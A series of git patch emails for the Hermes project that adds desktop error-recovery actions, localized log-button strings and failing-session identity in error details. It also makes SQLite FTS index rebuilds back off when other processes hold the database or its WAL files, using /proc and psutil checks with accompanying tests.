} +// Isolated because useNavigate() THROWS outside a (bare test +// harnesses, embedded panes render threads router-free). The parent gates +// this child's mount on useInRouterContext(), which is safe anywhere. +const SwitchProviderAction: FC<{ label: string }> = ({ label }) => { + const navigate = useNavigate() + + return ( + + ) +} + const ErrorRecoveryActions: FC = () => { const { t } = useI18n() const copy = t.assistant.thread @@ -473,7 +486,9 @@ const ErrorRecoveryActions: FC = () => { return status?.type === 'incomplete' && typeof status.error === 'string' ? status.error : '' }) - const navigate = useNavigate() + // useNavigate() would throw here when no Router is above us; the deep-link + // child mounts only when one is (see SwitchProviderAction). + const inRouter = useInRouterContext() const model = useStore($currentModel) // Retry = assistant-ui reload (same wiring as the footer's refresh action): @@ -525,11 +540,7 @@ const ErrorRecoveryActions: FC = () => { )} - {showSwitchProvider && ( - - )} + {showSwitchProvider && inRouter && } {window.hermesDesktop?.logsRoot && ( + )} {window.hermesDesktop?.logsRoot && ( - )} {window.hermesDesktop?.logsRoot && ( )} diff --git a/apps/desktop/src/i18n/ar.ts b/apps/desktop/src/i18n/ar.ts index b0aec6714f..c8ebdf5e97 100644 --- a/apps/desktop/src/i18n/ar.ts +++ b/apps/desktop/src/i18n/ar.ts @@ -2449,6 +2449,7 @@ export const ar = defineLocale({ errorSwitchProvider: 'تبديل المزوّد', errorOpenLogs: 'فتح السجلات', errorOpenLogsFailed: 'تعذّر فتح مجلد السجلات', + errorOpenDesktopLogs: 'فتح سجلات سطح المكتب', errorCopyDiagnostics: 'نسخ تفاصيل الخطأ', filesChanged: count => `${count} ملفات تم تغييرها`, reviewChanges: 'مراجعة', diff --git a/apps/desktop/src/i18n/en.ts b/apps/desktop/src/i18n/en.ts index 6a10372ed7..64411758e6 100644 --- a/apps/desktop/src/i18n/en.ts +++ b/apps/desktop/src/i18n/en.ts @@ -3094,6 +3094,7 @@ export const en: Translations = { errorSwitchProvider: 'Switch provider', errorOpenLogs: 'Open logs', errorOpenLogsFailed: 'Could not open the logs folder', + errorOpenDesktopLogs: 'Open Desktop logs', errorCopyDiagnostics: 'Copy error details', filesChanged: count => (count === 1 ? '1 file changed' : `${count} files changed`), reviewChanges: 'Review', diff --git a/apps/desktop/src/i18n/ja.ts b/apps/desktop/src/i18n/ja.ts index a65a18bab6..c493562019 100644 --- a/apps/desktop/src/i18n/ja.ts +++ b/apps/desktop/src/i18n/ja.ts @@ -2746,6 +2746,7 @@ export const ja = defineLocale({ errorSwitchProvider: 'プロバイダーを切り替え', errorOpenLogs: 'ログを開く', errorOpenLogsFailed: 'ログフォルダを開けませんでした', + errorOpenDesktopLogs: 'デスクトップのログを開く', errorCopyDiagnostics: 'エラー詳細をコピー', filesChanged: count => `${count} 件のファイルを変更`, reviewChanges: 'レビュー', diff --git a/apps/desktop/src/i18n/types.ts b/apps/desktop/src/i18n/types.ts index dc8151982e..1cecefa8a2 100644 --- a/apps/desktop/src/i18n/types.ts +++ b/apps/desktop/src/i18n/types.ts @@ -2665,6 +2665,7 @@ export interface Translations { errorSwitchProvider: string errorOpenLogs: string errorOpenLogsFailed: string + errorOpenDesktopLogs: string errorCopyDiagnostics: string filesChanged: (count: number) => string reviewChanges: string diff --git a/apps/desktop/src/i18n/zh-hant.ts b/apps/desktop/src/i18n/zh-hant.ts index e44d2397f1..ff5145efb8 100644 --- a/apps/desktop/src/i18n/zh-hant.ts +++ b/apps/desktop/src/i18n/zh-hant.ts @@ -2656,6 +2656,7 @@ export const zhHant = defineLocale({ errorSwitchProvider: '切換服務商', errorOpenLogs: '開啟日誌', errorOpenLogsFailed: '無法開啟日誌資料夾', + errorOpenDesktopLogs: '開啟桌面端日誌', errorCopyDiagnostics: '複製錯誤詳細資訊', filesChanged: count => `${count} 個檔案已變更`, reviewChanges: '檢視', diff --git a/apps/desktop/src/i18n/zh.ts b/apps/desktop/src/i18n/zh.ts index 7212cf1eec..b1dbcb07ae 100644 --- a/apps/desktop/src/i18n/zh.ts +++ b/apps/desktop/src/i18n/zh.ts @@ -3258,6 +3258,7 @@ export const zh: Translations = { errorSwitchProvider: '切换服务商', errorOpenLogs: '打开日志', errorOpenLogsFailed: '无法打开日志文件夹', + errorOpenDesktopLogs: '打开桌面端日志', errorCopyDiagnostics: '复制错误详情', filesChanged: count => `${count} 个文件已更改`, reviewChanges: '查看', diff --git a/apps/desktop/src/lib/error-surface.test.ts b/apps/desktop/src/lib/error-surface.test.ts index ea7f9bd87d..3ed04ca4b2 100644 --- a/apps/desktop/src/lib/error-surface.test.ts +++ b/apps/desktop/src/lib/error-surface.test.ts @@ -32,6 +32,21 @@ describe('parseErrorSurface', () => { it('honors retryable=false', () => { expect(parseErrorSurface({ layer: 'auth', code: 'auth_permanent', retryable: false })?.retryable).toBe(false) }) + + it('carries the failing session identity when present', () => { + const surface = parseErrorSurface({ + layer: 'provider', + code: 'rate_limit', + retryable: true, + provider: 'openrouter', + model: 'test/m1' + }) + + expect(surface?.provider).toBe('openrouter') + expect(surface?.model).toBe('test/m1') + // Absent identity yields no keys, not empty strings. + expect(parseErrorSurface({ layer: 'provider', code: 'x', retryable: true })?.provider).toBeUndefined() + }) }) describe('formatErrorDiagnostics', () => { @@ -48,6 +63,19 @@ describe('formatErrorDiagnostics', () => { expect(text).toContain('error: boom') }) + it('prefers the descriptor identity over the caller fallback', () => { + const text = formatErrorDiagnostics({ + errorText: 'boom', + // Foreground composer atom — potentially stale by click time. + model: 'some/other-model', + surface: { layer: 'provider', code: 'rate_limit', retryable: true, provider: 'openrouter', model: 'failed/model' } + }) + + expect(text).toContain('provider: openrouter') + expect(text).toContain('model: failed/model') + expect(text).not.toContain('some/other-model') + }) + it('omits absent fields without leaving blank lines', () => { const text = formatErrorDiagnostics({ errorText: 'boom' }) diff --git a/apps/desktop/src/lib/error-surface.ts b/apps/desktop/src/lib/error-surface.ts index cf41e3c480..44e4511beb 100644 --- a/apps/desktop/src/lib/error-surface.ts +++ b/apps/desktop/src/lib/error-surface.ts @@ -25,6 +25,11 @@ export interface ErrorSurface { code: string /** False when retrying unchanged reproduces the same failure. */ retryable: boolean + /** The failing session's provider/model, captured at classification time — + * preferred over the foreground composer's atoms, which can point at a + * different model by the time the user clicks an action. */ + provider?: string + model?: string } /** Validate a wire payload into an ErrorSurface, or null when absent/garbled. */ @@ -33,7 +38,7 @@ export function parseErrorSurface(value: unknown): ErrorSurface | null { return null } - const raw = value as { code?: unknown; layer?: unknown; retryable?: unknown } + const raw = value as { code?: unknown; layer?: unknown; model?: unknown; provider?: unknown; retryable?: unknown } const layer = typeof raw.layer === 'string' ? (raw.layer as ErrorSurfaceLayer) : null if (!layer || !ERROR_SURFACE_LAYERS.includes(layer)) { @@ -43,7 +48,9 @@ export function parseErrorSurface(value: unknown): ErrorSurface | null { return { layer, code: typeof raw.code === 'string' && raw.code ? raw.code : 'unknown', - retryable: raw.retryable !== false + retryable: raw.retryable !== false, + ...(typeof raw.provider === 'string' && raw.provider ? { provider: raw.provider } : {}), + ...(typeof raw.model === 'string' && raw.model ? { model: raw.model } : {}) } } @@ -55,14 +62,19 @@ export function formatErrorDiagnostics(input: { provider?: string surface?: ErrorSurface | null }): string { + // The descriptor's identity (captured when the turn failed) beats the + // caller-supplied fallback (typically the foreground composer's atoms). + const provider = input.surface?.provider || input.provider + const model = input.surface?.model || input.model + const lines = [ - '── Hermes error diagnostics ──', + '── Hermes error details ──', `time: ${new Date().toISOString()}`, input.surface ? `layer: ${input.surface.layer}` : null, input.surface ? `code: ${input.surface.code}` : null, input.surface ? `retryable: ${input.surface.retryable}` : null, - input.provider ? `provider: ${input.provider}` : null, - input.model ? `model: ${input.model}` : null, + provider ? `provider: ${provider}` : null, + model ? `model: ${model}` : null, input.appVersion ? `app: ${input.appVersion}` : null, `error: ${input.errorText}` ] diff --git a/tests/agent/test_error_surface.py b/tests/agent/test_error_surface.py index e17dcfd474..3a9b735d15 100644 --- a/tests/agent/test_error_surface.py +++ b/tests/agent/test_error_surface.py @@ -41,8 +41,10 @@ def test_result_none_for_healthy_result(): def test_result_auth_reasons_map_to_auth_layer(): + # Both auth reasons are non-retryable, matching classify_api_error's own + # verdict (a bare retry replays the same rejected credential). surface = build_error_surface_from_result(_failed_result("auth")) - assert surface == {"layer": LAYER_AUTH, "code": "auth", "retryable": True} + assert surface == {"layer": LAYER_AUTH, "code": "auth", "retryable": False} surface = build_error_surface_from_result(_failed_result("auth_permanent")) assert surface["layer"] == LAYER_AUTH @@ -77,6 +79,8 @@ def test_result_provider_default_for_classified_reasons(): def test_result_non_retryable_reasons(): for reason in ( + "auth", + "format_error", "content_policy_blocked", "model_not_found", "ssl_cert_verification", @@ -85,6 +89,32 @@ def test_result_non_retryable_reasons(): assert surface["retryable"] is False, reason +def test_result_prefers_classifier_retry_verdict(): + """conversation_loop stamps ``failure_retryable`` from the real + ClassifiedError — it must win over the fallback reason set.""" + surface = build_error_surface_from_result( + _failed_result("unknown", failure_retryable=False) + ) + assert surface["retryable"] is False + + surface = build_error_surface_from_result( + _failed_result("format_error", failure_retryable=True) + ) + assert surface["retryable"] is True + + +def test_result_stamps_failing_session_identity(): + surface = build_error_surface_from_result( + _failed_result("rate_limit"), provider="openrouter", model="test/m1" + ) + assert surface["provider"] == "openrouter" + assert surface["model"] == "test/m1" + + # Absent identity omits the keys instead of stamping empty strings. + surface = build_error_surface_from_result(_failed_result("rate_limit")) + assert "provider" not in surface and "model" not in surface + + def test_result_timeout_on_custom_endpoint_is_endpoint_layer(): surface = build_error_surface_from_result( _failed_result("timeout"), provider="custom" diff --git a/tests/tui_gateway/test_failed_turn_retention.py b/tests/tui_gateway/test_failed_turn_retention.py index 455fcc22d5..30987d5a9e 100644 --- a/tests/tui_gateway/test_failed_turn_retention.py +++ b/tests/tui_gateway/test_failed_turn_retention.py @@ -197,6 +197,10 @@ def test_returned_error_result_carries_error_surface(emits, turn_env): "layer": "provider", "code": "rate_limit", "retryable": True, + # The failing session's identity rides the descriptor so clients + # report the model that actually failed, not the composer's current. + "provider": "openrouter", + "model": "test/model", } snapshot = server._inflight_snapshot(session) diff --git a/website/docs/user-guide/desktop.md b/website/docs/user-guide/desktop.md index 80ade53afd..c6d7439a6a 100644 --- a/website/docs/user-guide/desktop.md +++ b/website/docs/user-guide/desktop.md @@ -420,7 +420,10 @@ generic error toast. The card offers recovery actions matched to the failure: deterministically reproduce the failure, e.g. a content-policy rejection). - **Switch provider** — jumps to Settings → Models for provider, endpoint, auth, and billing failures. -- **Open logs** — opens `HERMES_HOME/logs` in your file manager. +- **Open logs** — opens `HERMES_HOME/logs` in your file manager. On a remote + or Cloud connection the button reads **Open Desktop logs**: it opens the + local Desktop-side logs (transport evidence), since the failed turn's + gateway/agent logs live on the remote machine. - **Copy error details** — copies a compact plain-text summary (layer, code, provider/model, error message) you can paste into a bug report or Discord. From fc72d6c71691a48743dc641aaa6679916c3c8eb0 Mon Sep 17 00:00:00 2001 From: fangliquanflq Date: Thu, 20 Aug 2026 21:04:39 +0800 Subject: [PATCH 078/161] fix(state): defer FTS rebuild under foreign WAL holders --- hermes_state.py | 62 +++++++++++++++ hermes_state_schema.py | 9 +++ tests/state/test_fts_runtime_rebuild.py | 100 ++++++++++++++++++++++++ 3 files changed, 171 insertions(+) diff --git a/hermes_state.py b/hermes_state.py index 4f4916761e..a7d706e296 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -4211,6 +4211,59 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) msg = str(exc).lower() return "fts5" in msg and "corrupt" in msg + def _foreign_state_db_holders(self) -> List[Tuple[int, str]]: + """Return foreign processes holding this DB or its WAL sidecars. + + Automatic FTS repair is structural maintenance, not an ordinary WAL + write. It must not run while another process remains attached: a + sidecar reset under that holder can leave the two processes writing + through different WAL inodes. ``psutil`` reads the kernel's open-file + table, including Linux ``(deleted)`` descriptors, so this also catches + a split brain already in progress. + + A scan failure is represented as an unknown holder. Skipping optional + automatic maintenance is safer than assuming quiescence; canonical + writes continue through the stale-FTS fail-open path. + """ + # The split-brain mechanism requires POSIX unlink semantics: Windows + # refuses to replace SQLite sidecars while another process has them + # open. Avoid psutil.open_files() there; querying arbitrary Windows + # processes can block for minutes on device-backed handles. + if _IS_WINDOWS: + return [] + if psutil is None: + return [(-1, "open-file scan unavailable")] + + def _canonical(path: str) -> str: + clean = path.removesuffix(" (deleted)") + return os.path.normcase(os.path.abspath(clean)) + + db_path = os.path.abspath(os.fspath(self.db_path)) + watched = { + _canonical(db_path), + _canonical(db_path + "-wal"), + _canonical(db_path + "-shm"), + } + holders: List[Tuple[int, str]] = [] + try: + for process in psutil.process_iter(["pid", "open_files"]): + info = process.info + pid = int(info["pid"]) + if pid == os.getpid(): + continue + for opened in info.get("open_files") or (): + path = getattr(opened, "path", "") + if path and _canonical(path) in watched: + holders.append((pid, path)) + except Exception as exc: + logger.warning( + "Could not prove state.db has no foreign holders; deferring " + "automatic FTS maintenance: %s", + exc, + ) + return holders or [(-1, f"open-file scan failed: {exc}")] + return holders + def _try_runtime_fts_rebuild(self, exc: sqlite3.DatabaseError) -> bool: """One-shot in-place FTS rebuild after a corrupt-index write failure. @@ -4234,6 +4287,15 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) if not self._is_fts_write_corruption_error(exc): return False self._fts_runtime_rebuild_attempted = True + foreign_holders = self._foreign_state_db_holders() + if foreign_holders: + logger.warning( + "Skipping automatic state.db FTS rebuild while foreign " + "processes hold the database or WAL sidecars (%s); detaching " + "FTS sync so canonical writes can continue.", + foreign_holders, + ) + return False logger.warning( "state.db write failed with an FTS-corruption error (%s) — " "attempting one-shot in-place FTS rebuild; canonical message " diff --git a/hermes_state_schema.py b/hermes_state_schema.py index 3fa101a772..ac996758df 100644 --- a/hermes_state_schema.py +++ b/hermes_state_schema.py @@ -368,6 +368,15 @@ class SessionSchemaMixin: def _recover_stale_fts(self, cursor: sqlite3.Cursor, *, legacy: bool) -> bool: """Atomically rebuild stale base/trigram indexes and resume syncing.""" + foreign_holders = self._foreign_state_db_holders() + if foreign_holders: + logger.warning( + "Deferred stale state.db FTS rebuild while foreign processes " + "hold the database or WAL sidecars (%s); canonical writes and " + "LIKE search remain available.", + foreign_holders, + ) + return False try: trigram_status = self._fts_table_probe(cursor, "messages_fts_trigram") except sqlite3.DatabaseError: diff --git a/tests/state/test_fts_runtime_rebuild.py b/tests/state/test_fts_runtime_rebuild.py index e9c14ecd54..d8bc8fb887 100644 --- a/tests/state/test_fts_runtime_rebuild.py +++ b/tests/state/test_fts_runtime_rebuild.py @@ -14,9 +14,11 @@ until a later open atomically rebuilds the index and restores the triggers. """ import sqlite3 +from types import SimpleNamespace import pytest +import hermes_state from hermes_state import ( FTS_STALE_KEY, LEGACY_FTS_SQL, @@ -84,6 +86,47 @@ def _base_fts_triggers(db_path): class TestRuntimeFtsRebuild: + def test_foreign_holder_detection_includes_deleted_wal( + self, db, tmp_path, monkeypatch + ): + db_path = tmp_path / "state.db" + + class FakePsutil: + @staticmethod + def process_iter(_attrs): + return iter( + ( + SimpleNamespace( + info={ + "pid": 111, + "open_files": [SimpleNamespace(path=str(db_path))], + } + ), + SimpleNamespace( + info={ + "pid": 222, + "open_files": [ + SimpleNamespace(path=f"{db_path}-wal (deleted)") + ], + } + ), + SimpleNamespace( + info={ + "pid": 333, + "open_files": [SimpleNamespace(path=str(tmp_path / "other.db"))], + } + ), + ) + ) + + monkeypatch.setattr(hermes_state, "psutil", FakePsutil) + monkeypatch.setattr(hermes_state, "_IS_WINDOWS", False) + monkeypatch.setattr(hermes_state.os, "getpid", lambda: 111) + + assert db._foreign_state_db_holders() == [ + (222, f"{db_path}-wal (deleted)") + ] + def test_corruption_error_classification_covers_both_sqlite_messages(self): """SQLite's message for a corrupt FTS index varies by version: older builds raise the generic malformed-image error, newer builds raise an @@ -242,6 +285,30 @@ class TestRuntimeFtsRebuild: assert _meta_value(db_path, FTS_STALE_KEY) == "1" assert _base_fts_triggers(db_path) == set() + def test_foreign_holder_skips_runtime_rebuild_and_fails_open( + self, db, tmp_path, monkeypatch + ): + if not db._fts_enabled: + pytest.skip("FTS5 unavailable in this build") + db_path = tmp_path / "state.db" + db.create_session("s1", source="test") + db.append_message("s1", "user", "seed") + _corrupt_fts(db_path) + + monkeypatch.setattr( + db, + "_foreign_state_db_holders", + lambda: [(4242, str(db_path) + "-wal")], + raising=False, + ) + + db.append_message("s1", "user", "canonical survives foreign holder") + + assert _message_contents(db_path)[-1] == "canonical survives foreign holder" + assert db._fts_stale is True + assert _meta_value(db_path, FTS_STALE_KEY) == "1" + assert _base_fts_triggers(db_path) == set() + def test_stale_search_preserves_not_semantics(self, db, tmp_path, monkeypatch): if not db._fts_enabled: pytest.skip("FTS5 unavailable in this build") @@ -324,6 +391,39 @@ class TestRuntimeFtsRebuild: finally: reopened.close() + def test_foreign_holder_defers_startup_stale_rebuild( + self, db, tmp_path, monkeypatch + ): + if not db._fts_enabled: + pytest.skip("FTS5 unavailable in this build") + db_path = tmp_path / "state.db" + db.create_session("s1", source="test") + db.append_message("s1", "user", "seed") + _corrupt_fts(db_path) + monkeypatch.setattr( + db, + "rebuild_fts", + lambda: (_ for _ in ()).throw(sqlite3.DatabaseError("still corrupt")), + ) + db.append_message("s1", "user", "before restart") + db.close() + + monkeypatch.setattr( + SessionDB, + "_foreign_state_db_holders", + lambda self: [(4242, str(db_path) + "-wal")], + raising=False, + ) + reopened = SessionDB(db_path=db_path) + try: + assert reopened._fts_stale is True + assert _meta_value(db_path, FTS_STALE_KEY) == "1" + assert _base_fts_triggers(db_path) == set() + reopened.append_message("s1", "user", "after deferred recovery") + assert _message_contents(db_path)[-1] == "after deferred recovery" + finally: + reopened.close() + def test_legacy_inline_fts_fails_open_and_recovers(self, tmp_path, monkeypatch): db_path = tmp_path / "legacy-state.db" raw = sqlite3.connect(str(db_path)) From c45e2b19c3cc1f623a89f7409145223cf65fb238 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:15:16 +0530 Subject: [PATCH 079/161] fix(state): guard gateway FTS rebuild + comment early flag-set Add the foreign-holder guard to gateway/session.py::_rebuild_fts_once(), the third FTS rebuild path that was not covered by the original fix. Also add a comment explaining why _fts_runtime_rebuild_attempted is set before the foreign-holder check: the fail-open path that follows persists FTS_STALE_KEY so the next startup retries via _recover_stale_fts. --- gateway/session.py | 13 +++++++++++++ hermes_state.py | 6 ++++++ 2 files changed, 19 insertions(+) diff --git a/gateway/session.py b/gateway/session.py index 3ba5b10c48..be74201c9f 100644 --- a/gateway/session.py +++ b/gateway/session.py @@ -3875,6 +3875,19 @@ class SessionStore: db = self._db if db is None or not hasattr(db, "rebuild_fts"): return False + # Guard against the same WAL split-brain risk as the automatic + # rebuild paths: skip when a foreign process holds state.db or + # its WAL sidecars open. + if hasattr(db, "_foreign_state_db_holders"): + foreign_holders = db._foreign_state_db_holders() + if foreign_holders: + logger.warning( + "Skipping Session DB FTS rebuild while foreign processes " + "hold the database or WAL sidecars (%s); canonical " + "transcript writes remain available.", + foreign_holders, + ) + return False try: rebuilt = db.rebuild_fts() except Exception as exc: diff --git a/hermes_state.py b/hermes_state.py index a7d706e296..c795815164 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -4286,6 +4286,12 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) return False if not self._is_fts_write_corruption_error(exc): return False + # Set the one-shot flag before the foreign-holder check: even when + # the rebuild is skipped, the fail-open path that follows persists + # the FTS_STALE_KEY marker so the next process startup will retry + # via _recover_stale_fts (which has its own holder guard). Setting + # the flag here also avoids re-running the expensive psutil scan on + # every subsequent corrupted write through this instance. self._fts_runtime_rebuild_attempted = True foreign_holders = self._foreign_state_db_holders() if foreign_holders: From 1c59daaace452d22ee24447bc212b2b2f0ee6db3 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:40:27 +0530 Subject: [PATCH 080/161] fix(state): use /proc readlinks + cmdline fallback for holder detection MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Address review feedback from @jackulau on PR #90871: 1. psutil.open_files() silently drops '(deleted)' WAL sidecar entries on Linux because isfile_strict() stats the literal path including the suffix and fails. Switch to direct /proc//fd readlinks which preserve the '(deleted)' suffix so _canonical can match. 2. psutil.process_iter() converts AccessDenied to None, which or-() skips silently — the fail-closed branch never runs. For the root-gateway vs user-desktop topology in the issue, the fd table is unreadable but /proc//cmdline is world-readable. Add a cmdline fallback that flags uninspectable processes. Also keep the psutil path for macOS/BSD (no '(deleted)' convention). --- hermes_state.py | 75 +++++++++++++++++-- tests/state/test_fts_runtime_rebuild.py | 95 +++++++++++++++++++++++++ 2 files changed, 165 insertions(+), 5 deletions(-) diff --git a/hermes_state.py b/hermes_state.py index c795815164..6d6a4ddb62 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -3049,6 +3049,22 @@ def count_db_holders(db_path: Path) -> Optional[int]: return None +def _read_proc_cmdline(pid: int) -> Optional[str]: + """Read /proc//cmdline, world-readable even when fd table is not. + + Returns the cmdline as a space-joined string, or None when unreadable + (process exited, or hidepid mount). + """ + try: + with open(f"/proc/{pid}/cmdline", "rb") as f: + raw = f.read() + if not raw: + return None + return raw.replace(b"\x00", b" ").decode("utf-8", "replace").strip() + except OSError: + return None + + # Lifecycle statuses surfaced by session pickers. Classification looks ONLY at # a session's final message row — role, whether it carries tool_calls, and its # finish_reason — so it stays O(1) per session (see @@ -4217,9 +4233,7 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) Automatic FTS repair is structural maintenance, not an ordinary WAL write. It must not run while another process remains attached: a sidecar reset under that holder can leave the two processes writing - through different WAL inodes. ``psutil`` reads the kernel's open-file - table, including Linux ``(deleted)`` descriptors, so this also catches - a split brain already in progress. + through different WAL inodes. A scan failure is represented as an unknown holder. Skipping optional automatic maintenance is safer than assuming quiescence; canonical @@ -4245,20 +4259,71 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) _canonical(db_path + "-shm"), } holders: List[Tuple[int, str]] = [] + + # On Linux, read /proc//fd symlinks directly. psutil's + # open_files() filters through isfile_strict(), which stats the + # literal path — for an unlinked WAL sidecar the kernel returns + # "/path/state.db-wal (deleted)" and stat fails, so the entry is + # silently dropped and the split-brain holder is never seen. + # /proc readlinks preserve the "(deleted)" suffix so _canonical can + # strip it and match. + if sys.platform.startswith("linux"): + try: + own_pid = os.getpid() + for pid_str in os.listdir("/proc"): + if not pid_str.isdigit(): + continue + pid = int(pid_str) + if pid == own_pid: + continue + fd_dir = f"/proc/{pid}/fd" + try: + fds = os.listdir(fd_dir) + except OSError: + # Cannot read this process's fd table (different + # user, e.g. root gateway vs user desktop). + # /proc//cmdline is world-readable by default, + # so check whether this is a Hermes process. + cmdline = _read_proc_cmdline(pid) + if cmdline is not None: + holders.append((pid, f"uninspectable holder: {cmdline[:80]}")) + continue + for fd in fds: + try: + target = os.readlink(f"{fd_dir}/{fd}") + except OSError: + continue + if _canonical(target) in watched: + holders.append((pid, target)) + except Exception as exc: + logger.warning( + "Could not prove state.db has no foreign holders; " + "deferring automatic FTS maintenance: %s", + exc, + ) + return holders or [(-1, f"open-file scan failed: {exc}")] + return holders + + # macOS / BSD: use psutil.open_files(). macOS does not use the + # "(deleted)" suffix convention, so psutil's filtering is safe here. try: for process in psutil.process_iter(["pid", "open_files"]): info = process.info pid = int(info["pid"]) if pid == os.getpid(): continue + # psutil's as_dict() converts AccessDenied to None, which + # or-() turns into an empty iteration. On macOS this is + # acceptable: the gateway/desktop topology from the issue is + # Linux-specific (systemd units running as root). for opened in info.get("open_files") or (): path = getattr(opened, "path", "") if path and _canonical(path) in watched: holders.append((pid, path)) except Exception as exc: logger.warning( - "Could not prove state.db has no foreign holders; deferring " - "automatic FTS maintenance: %s", + "Could not prove state.db has no foreign holders; " + "deferring automatic FTS maintenance: %s", exc, ) return holders or [(-1, f"open-file scan failed: {exc}")] diff --git a/tests/state/test_fts_runtime_rebuild.py b/tests/state/test_fts_runtime_rebuild.py index d8bc8fb887..fee735ebb4 100644 --- a/tests/state/test_fts_runtime_rebuild.py +++ b/tests/state/test_fts_runtime_rebuild.py @@ -13,6 +13,7 @@ sync triggers, and retries the canonical write. Search degrades to ``LIKE`` until a later open atomically rebuilds the index and restores the triggers. """ +import os import sqlite3 from types import SimpleNamespace @@ -122,11 +123,105 @@ class TestRuntimeFtsRebuild: monkeypatch.setattr(hermes_state, "psutil", FakePsutil) monkeypatch.setattr(hermes_state, "_IS_WINDOWS", False) monkeypatch.setattr(hermes_state.os, "getpid", lambda: 111) + # Force the macOS/psutil path even on Linux test runners + monkeypatch.setattr(hermes_state.sys, "platform", "darwin") assert db._foreign_state_db_holders() == [ (222, f"{db_path}-wal (deleted)") ] + def test_foreign_holder_detection_proc_readlink_deleted_wal( + self, db, tmp_path, monkeypatch + ): + """Linux /proc//fd readlinks preserve '(deleted)' suffix. + + psutil.open_files() drops these entries (isfile_strict stats the + literal path and fails). The /proc path catches the split-brain + holder that psutil silently misses. + """ + db_path = tmp_path / "state.db" + db_path_wal = str(db_path) + "-wal" + + # Build a fake /proc with two PIDs: self (111) and foreign (222). + proc_root = tmp_path / "proc" + for pid in (111, 222, 333): + fd_dir = proc_root / str(pid) / "fd" + fd_dir.mkdir(parents=True) + # PID 222 holds the deleted WAL sidecar + os.symlink(db_path_wal + " (deleted)", str(proc_root / "222" / "fd" / "3")) + # PID 111 (self) holds the db — should be excluded + os.symlink(str(db_path), str(proc_root / "111" / "fd" / "3")) + # PID 333 holds an unrelated file + other = tmp_path / "other.db" + other.touch() + os.symlink(str(other), str(proc_root / "333" / "fd" / "3")) + + monkeypatch.setattr(hermes_state, "_IS_WINDOWS", False) + monkeypatch.setattr(hermes_state.os, "getpid", lambda: 111) + monkeypatch.setattr(hermes_state.sys, "platform", "linux") + real_listdir = os.listdir + def _listdir(path): + if isinstance(path, str): + path = path.replace("/proc", str(proc_root)) + return real_listdir(path) + monkeypatch.setattr(hermes_state.os, "listdir", _listdir) + real_readlink = os.readlink + def _readlink(path): + path = path.replace("/proc", str(proc_root)) + return real_readlink(path) + monkeypatch.setattr(hermes_state.os, "readlink", _readlink) + + holders = db._foreign_state_db_holders() + assert holders == [(222, db_path_wal + " (deleted)")] + + def test_foreign_holder_uninspectable_process_cmdline_fallback( + self, db, tmp_path, monkeypatch + ): + """A process whose fd table is unreadable (different user) is still + flagged when /proc//cmdline identifies it as a Hermes process.""" + db_path = tmp_path / "state.db" + + proc_root = tmp_path / "proc" + for pid in (111, 222): + (proc_root / str(pid) / "fd").mkdir(parents=True) + # PID 222's fd dir is unreadable (PermissionError) + os.chmod(proc_root / "222" / "fd", 0o000) + # PID 222's cmdline is world-readable and looks like Hermes + cmdline_path = proc_root / "222" / "cmdline" + cmdline_path.write_bytes(b"python3\x00hermes_cli.main\x00chat\x00") + + monkeypatch.setattr(hermes_state, "_IS_WINDOWS", False) + monkeypatch.setattr(hermes_state.os, "getpid", lambda: 111) + monkeypatch.setattr(hermes_state.sys, "platform", "linux") + real_listdir = os.listdir + def _listdir(path): + if isinstance(path, str): + path = path.replace("/proc", str(proc_root)) + return real_listdir(path) + monkeypatch.setattr(hermes_state.os, "listdir", _listdir) + # _read_proc_cmdline opens /proc//cmdline directly; redirect + # it to our fake proc tree. + def _fake_cmdline(pid): + fake_path = str(proc_root / str(pid) / "cmdline") + try: + with open(fake_path, "rb") as f: + raw = f.read() + if not raw: + return None + return raw.replace(b"\x00", b" ").decode("utf-8", "replace").strip() + except OSError: + return None + monkeypatch.setattr(hermes_state, "_read_proc_cmdline", _fake_cmdline) + + holders = db._foreign_state_db_holders() + # Should include PID 222 with the cmdline info + assert len(holders) == 1 + assert holders[0][0] == 222 + assert "hermes_cli.main" in holders[0][1] + + # Cleanup + os.chmod(proc_root / "222" / "fd", 0o755) + def test_corruption_error_classification_covers_both_sqlite_messages(self): """SQLite's message for a corrupt FTS index varies by version: older builds raise the generic malformed-image error, newer builds raise an From 2ea5287da0ed3556110e5e5c88210b41db19ec6d Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:52:02 +0530 Subject: [PATCH 081/161] fix(state): only flag uninspectable Hermes processes as holders MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The cmdline fallback was matching every system daemon with an unreadable fd table (init, systemd-journald, dockerd, etc.), causing FTS rebuilds to be skipped on every Linux system. Add _looks_like_hermes filter so only processes whose cmdline contains Hermes markers are flagged — matching @jackulau's suggestion of 'uninspectable AND identifiable as another Hermes process.' --- hermes_state.py | 21 +++++++++++++++++++-- 1 file changed, 19 insertions(+), 2 deletions(-) diff --git a/hermes_state.py b/hermes_state.py index 6d6a4ddb62..1e2132ea2c 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -3065,6 +3065,21 @@ def _read_proc_cmdline(pid: int) -> Optional[str]: return None +_HERMES_CMDLINE_MARKERS = ("hermes_cli.main", "hermes_cli/main", "hermes serve", + "hermes-agent", "hermes gateway", "hermes chat") + + +def _looks_like_hermes(cmdline: str) -> bool: + """Heuristic: does this cmdline look like a Hermes process? + + Used to decide whether an uninspectable process (fd table unreadable + due to different user) should be treated as a potential state.db holder. + We only flag processes that look like Hermes, not every system daemon. + """ + lower = cmdline.lower() + return any(marker in lower for marker in _HERMES_CMDLINE_MARKERS) + + # Lifecycle statuses 